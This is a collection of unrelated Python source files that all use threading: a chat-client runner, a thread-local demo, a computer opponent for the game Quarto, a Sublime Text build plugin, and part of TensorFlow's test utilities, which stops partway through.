Run.py
|
import string
from Read import getUser, getMessage
from Initialize import createUsers, switchUser, startRooms
from Settings import usernames
import threading
from GUI import GUI
def refreshMessages():
    from Initialize import users, currentUserIndex
    readbuffer = ""
    while True:
        readbuffer = readbuffer + users[currentUserIndex].recv(1024)
        temp = string.split(readbuffer, "\n")
        readbuffer = temp.pop()
        for line in temp:
            gui.displayMessage(line)
            user = getUser(line)
            message = getMessage(line)
            gui.displayMessage(user + " typed :" + message)

createUsers()

global gui
gui = GUI()
guiThread = threading.Thread(target=gui.startGUI)
guiThread.start()

startRooms(gui)

messageThread = threading.Thread(target=refreshMessages)
messageThread.start()
|
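Run.py above is Python 2 code: `string.split` no longer exists in Python 3, and there `socket.recv` returns `bytes`, which cannot be concatenated onto a `str` buffer. A minimal sketch of the same read-and-split loop under Python 3 (the `sock` and `handle_line` names are placeholders, not part of the original project):

```python
def read_lines(sock, handle_line):
    """Read from `sock` and dispatch complete, newline-terminated lines."""
    readbuffer = b""
    while True:
        data = sock.recv(1024)
        if not data:
            break  # peer closed the connection
        readbuffer += data
        # Everything before the last "\n" is complete; keep the remainder buffered.
        *lines, readbuffer = readbuffer.split(b"\n")
        for line in lines:
            handle_line(line.decode("utf-8", errors="replace"))
```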
local.py
|
#!/usr/bin/env python
# encoding: UTF-8
import threading
local=threading.local()
local.tname='main'
def func():
    local.tname='notmain'
    print local.tname
t1=threading.Thread(target=func)
t1.start()
t1.join()
print local.tname
|
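local.py is Python 2 (`print` statements). What it demonstrates is that `threading.local()` storage is per-thread: the assignment inside `func` is visible only to the worker thread, so the final print in the main thread still shows `main`. A rough Python 3 equivalent of the same check (written here for illustration, not part of the original file):

```python
import threading

local = threading.local()
local.tname = 'main'

def func():
    # Each thread gets its own attribute namespace on `local`.
    local.tname = 'notmain'
    assert local.tname == 'notmain'

t1 = threading.Thread(target=func)
t1.start()
t1.join()

# The worker's assignment did not leak back into the main thread.
assert local.tname == 'main'
print(local.tname)  # -> main
```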
racunalnik.py
|
import threading  # for running the computation concurrently
import random     # for a random choice of the first move
import time
import logging    # for the debug message in prekini()
from minimaxAB import *
from quarto import *
from igra import *

######################################################################
## Computer player

class Racunalnik():
    def __init__(self, gui, algoritem, tezavnost):
        self.gui = gui
        self.algoritem = algoritem  # Algorithm that computes the move
        self.mislec = None          # Thread that does the thinking
        self.globina = MINIMAXAB_GLOBINA
        self.casovna_omejitev = tezavnost / 100
        self.globinska_omejitev = 16

    def igraj(self):
        """Play the move returned by the algorithm."""
        # Create a thread and hand it a *copy* of the game (so it does not confuse the GUI):
        if self.gui.igra.izbrana_figura == None:
            # Random choice of the first playing piece
            self.gui.izberi_figuro(random.choice(self.gui.igra.mozne_figure))
            # Alternative: choose the first available piece
            # self.gui.izberi_figuro(self.gui.igra.mozne_figure[0])
        else:
            self.mislec = threading.Thread(
                target=lambda: self.algoritem.izracunaj_potezo(self.gui.igra.kopija(), self.globina))
            # Start the thread:
            self.mislec.start()
            self.zacni_meriti_cas = time.time()
            # Go check whether a move has been found:
            self.gui.plosca.after(100, self.preveri_potezo)

    def preveri_potezo(self):
        """Every 100 ms, check whether the algorithm has already computed a move."""
        if (self.algoritem.poteza is not None) and (self.algoritem.figura is not None):
            # The algorithm found a move; play it if there was no interruption
            self.pretekli_cas = time.time() - self.zacni_meriti_cas
            if self.pretekli_cas > self.casovna_omejitev or self.globinska_omejitev <= self.globina:
                if len(self.gui.igra.veljavne_poteze()) == 16:
                    self.globina = MINIMAXAB_GLOBINA
                self.gui.povleci_potezo(self.algoritem.poteza)
                if self.algoritem.figura != 'konec':
                    self.gui.izberi_figuro(self.algoritem.figura)
                # The worker thread is no longer active, so we "forget" it
                self.mislec = None
            else:  # the move was computed too quickly, so increase the search depth
                self.globina += 1
                self.igraj()
        else:
            # The algorithm has not found a move yet; check again in 100 ms
            self.gui.plosca.after(100, self.preveri_potezo)

    def prekini(self):
        # The GUI calls this method when thinking has to be interrupted.
        if self.mislec:
            logging.debug("Interrupting {0}".format(self.mislec))
            # Tell the algorithm to stop thinking
            self.algoritem.prekini()
            # Wait for the thread to stop
            self.mislec.join()
            self.mislec = None

    def klik(self, p):
        # The computer ignores clicks on the game board
        pass

    def gumb_klik(self, p):
        # The computer ignores clicks on the free pieces
        pass
|
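Racunalnik combines a worker thread with Tkinter-style polling: `igraj` starts a thread running `izracunaj_potezo` on a copy of the game, and `preveri_potezo` reschedules itself with `plosca.after(100, ...)` until the algorithm has published a move. A GUI-free sketch of that pattern, with hypothetical names not taken from the project:

```python
import threading
import time

class BackgroundSearch:
    """Toy version of the thread-plus-polling pattern used by Racunalnik."""

    def __init__(self):
        self.result = None           # published by the worker when done

    def _work(self):
        time.sleep(0.2)              # stand-in for izracunaj_potezo()
        self.result = "computed move"

    def start(self):
        threading.Thread(target=self._work, daemon=True).start()

    def poll(self, interval=0.1):
        # In the GUI this check is rescheduled with plosca.after(100, ...)
        # instead of blocking; here we simply sleep between checks.
        while self.result is None:
            time.sleep(interval)
        return self.result

if __name__ == "__main__":
    search = BackgroundSearch()
    search.start()
    print(search.poll())
```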
sbot_builder.py
|
import subprocess
import threading
import os
import json
import sublime
import sublime_plugin
try:
from SbotCommon.sbot_common import get_store_fn
except ModuleNotFoundError as e:
sublime.message_dialog('SbotBuilder plugin requires SbotCommon plugin')
raise ImportError('SbotBuilder plugin requires SbotCommon plugin')
BUILDER_SETTINGS_FILE = "SbotBuilder.sublime-settings"
# Definitions. Key is build file extension, value is type.
BUILD_TYPES = {'sln': 'msbuild', 'csproj': 'msbuild', 'vcxproj': 'msbuild'}
#-----------------------------------------------------------------------------------
class SbotBuilderCommand(sublime_plugin.WindowCommand):
# From https://www.sublimetext.com/docs/build_systems.html
_encoding = 'utf-8'
_killed = False
_proc = None
_output_view = None
_output_view_lock = threading.Lock()
_prev_view = None
# The persisted builders: key is st project name and value is corresponding build file.
_blds = None
_store_fn = '???'
def is_enabled(self, arg=''):
# The Cancel build option should only be available when the process is still running.
if arg == 'kill':
return self._proc is not None and self._proc.poll() is None
return True
def run(self, arg=''):
try:
settings = sublime.load_settings(BUILDER_SETTINGS_FILE)
# Lazy init.
if self._blds is None:
self._blds = {}
file_path = settings.get('file_path')
self._store_fn = get_store_fn(file_path, 'all.sbot-bld')
self._open_blds()
vars = self.window.extract_variables()
st_project_fn = vars['project_base_name']
# Process specific command.
if arg == 'kill':
if self._proc:
self._killed = True
self._proc.terminate()
elif arg == 'select':
# Sanity check.
if not vars['file_extension'] in BUILD_TYPES:
raise("Build file type not supported")
# Store current selected file to build with in this project.
fn = vars['file']
self._blds[st_project_fn] = fn
self._save_blds()
elif arg == '' or arg == 'rebuild':
# Sanity check.
if st_project_fn not in self._blds:
raise("No build file selected for this project")
build_file = self._blds[st_project_fn]
build_cmd, res_regex, res_syntax = self._get_build_specs(build_file, arg)
working_dir = vars['file_path']
# A lock is used to ensure only one thread at a time is touching the output.
with self._output_view_lock:
# Create view for output.
if(settings.get('output') == 'panel'):
# Creating the panel implicitly clears any previous contents.
self._output_view = self.window.create_output_panel('exec')
else: # assume plain view
if self._output_view not in self.window.views():
self._output_view = self.window.new_file()
self._output_view.set_scratch(True)
# In views, find results fail until the focus is lost and regained.
# This is a bug in Sublime, so work around it by changing the focus.
self._prev_view = self.window.active_view()
self.window.focus_view(self._output_view)
# Enable result navigation.
# https://sublime-text-unofficial-documentation.readthedocs.io/en/latest/reference/settings.html
view_settings = self._output_view.settings()
view_settings.set('result_base_dir', working_dir)
view_settings.set('syntax', res_syntax)
view_settings.set('result_file_regex', res_regex)
view_settings.set('word_wrap', True)
# diags: sublime.log_result_regex(True)
if(settings.get('output') == 'panel'):
self.window.run_command('show_panel', {'panel': 'output.exec'})
else: # assume view
pass
# Maybe clean up first.
if self._proc is not None:
self._proc.terminate()
self._proc = None
self._proc = subprocess.Popen(build_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=working_dir)
self._killed = False
# Go!
threading.Thread(target=self._read_handle, args=(self._proc.stdout,)).start()
except Exception as e:
sublime.error_message(f"{e}")
def _get_build_specs(self, build_file, arg):
build_cmd = None
res_regex = None
res_syntax = None
bld_root, bld_ext = os.path.splitext(build_file)
bld_ext = bld_ext.replace('.', '')
if bld_ext in BUILD_TYPES:
bt = BUILD_TYPES[bld_ext]
if bt == 'msbuild':
# Assemble the build command. Set env then run msbuild.
cmd = 'Build'
if arg == 'rebuild':
cmd = 'Rebuild'
elif arg == 'init':
cmd = 'Restore'
cmd1 = '\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\VsDevCmd.bat\"'
cmd2 = f"""msbuild \"{build_file}\" /p:Configuration=Debug /t:{cmd} -v:m"""
args = [cmd1, '&', cmd2]
build_cmd = ' '.join(args)
res_regex = r'^([^\(]*)\(([0-9]+),([0-9]+)\): (.+)$'
res_syntax = 'MSBuild Output.sublime-syntax'
else:
raise(f"Invalid build file {build_file}")
return build_cmd, res_regex, res_syntax
def _read_handle(self, handle):
chunk_size = 2 ** 13 # 8192
out = b'' # data bytes
while True:
try:
data = os.read(handle.fileno(), chunk_size)
out += data
# If exactly the requested number of bytes was read, there may be more data.
if len(data) == chunk_size:
continue
if data == b'' and out == b'':
raise IOError('EOF')
sout = out.decode(self._encoding).replace('\r', '') # Win has extraneous CR.
self._queue_write(sout)
# A list of tuples of the regexed output:
# self._output_view.find_all_results_with_text()
if data == b'':
raise IOError('EOF')
out = b''
except (UnicodeDecodeError) as e:
self._queue_write(f'Error decoding output using {self._encoding} - {str(e)}')
break
except (IOError):
if self._killed:
self._queue_write('[Cancelled]')
else:
self._queue_write('[Finished]')
# In views, find results fail until the focus is lost and regained.
# This is a bug in Sublime, so work around it by changing the focus.
self.window.focus_view(self._prev_view)
self.window.focus_view(self._output_view)
break
def _queue_write(self, text):
sublime.set_timeout(lambda: self._do_write(text), 1)
def _do_write(self, text):
with self._output_view_lock:
self._output_view.run_command('append', {'characters': text})
def _open_blds(self):
''' General persistence opener. '''
if os.path.isfile(self._store_fn):
with open(self._store_fn, 'r') as fp:
self._blds = json.load(fp)
else:
# Assumes new file.
sublime.status_message('Creating new builder file')
self._blds = {}
self._save_blds()
def _save_blds(self):
''' General persistence saver. '''
with open(self._store_fn, 'w') as fp:
json.dump(self._blds, fp, indent=4)
|
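sbot_builder.py runs the build with `subprocess.Popen`, reads its output on a worker thread (`_read_handle`), and hands the text back to the UI thread via `sublime.set_timeout`. Outside of Sublime the same hand-off is usually done with a queue; a hedged, generic sketch (function and variable names are invented for illustration):

```python
import queue
import subprocess
import threading

def run_and_stream(cmd, on_line):
    """Run `cmd`, reading stdout on a worker thread and delivering decoded
    lines back to the calling thread through a queue."""
    q = queue.Queue()
    proc = subprocess.Popen(
        cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    def reader():
        for raw in proc.stdout:
            q.put(raw.decode("utf-8", errors="replace").rstrip("\r\n"))
        q.put(None)  # sentinel: EOF

    threading.Thread(target=reader, daemon=True).start()

    while True:
        line = q.get()
        if line is None:
            break
        on_line(line)
    return proc.wait()

if __name__ == "__main__":
    run_and_stream("echo hello", print)
```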
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
class IsolateTest(object):
"""A context manager which isolates resources in its block.
Provides an Eager-agnostic abstraction for preventing the sharing of
variables and other resources.
In graph mode, resource handle ops are only executed in a particular Session,
isolating them from resources with the same name in other Graphs. In Eager,
separate Sessions do not exist, so resources (particularly ResourceVariables)
would be shared implicitly if a resource of the same name were created
anywhere in a Python process. Multiple handles to the same resource would
cause several issues, and so this type of sharing will raise an exception.
Using resources with the same name in a single Python process may be useful
(especially for unit tests), so this context manager provides an abstraction
for isolating resources. Using a resource created in one Isolation environment
in another is an error.
Example usage in Eager mode:
```python
import tensorflow as tf
# Import subject to change
from tensorflow.contrib.eager.python import tfe
tfe.enable_eager_execution()
for hyperparameter in [1, 2, 3]:
with tfe.IsolateTest():
v = tfe.Variable(name="v", initial_value=hyperparameter)
# train model, test results ...
```
IsolateTest is currently exposed through contrib.eager, but it creates a new
default Graph and provides equivalent safety in graph mode.
"""
def __init__(self):
if context.in_eager_mode() and tape.could_possibly_record():
raise ValueError("Cannot isolate Eager execution with an active tape.")
# In Eager, Graphs set a container which isolates resources, and maintain a
# VariableStore which caches ResourceVariable objects created through
# get_variable. So setting the default Graph has the side effect of
# isolating Eager resources.
with context.eager_mode():
# Create the graph in Eager mode, as this provides stricter semantics
# (i.e. has a unique container prefix). This prevents implicit sharing
# when a Graph-mode graph is created and then Eager mode is enabled (an
# error through enable_eager_execution, but common with context managers
# in unit tests).
self._graph_as_default_context_manager = ops.Graph().as_default()
def __enter__(self):
self._graph_as_default_context_manager.__enter__()
def __exit__(self, type_arg, value_arg, traceback_arg):
return self._graph_as_default_context_manager.__exit__(
type_arg, value_arg, traceback_arg)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_container_prefix = ops.get_default_graph()._container_prefix
with IsolateTest():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the container prefix so that we can print the values
# of variables which get leaked when executing eagerly.
ops.get_default_graph()._container_prefix = outside_container_prefix
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._last_zero = [None]
backprop._shape_dtype = [None, None]
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(
__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True, assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with IsolateTest():
run_eager_mode(self, **kwargs)
return decorated
return decorator
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that tests in different runs cannot pollute each
other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
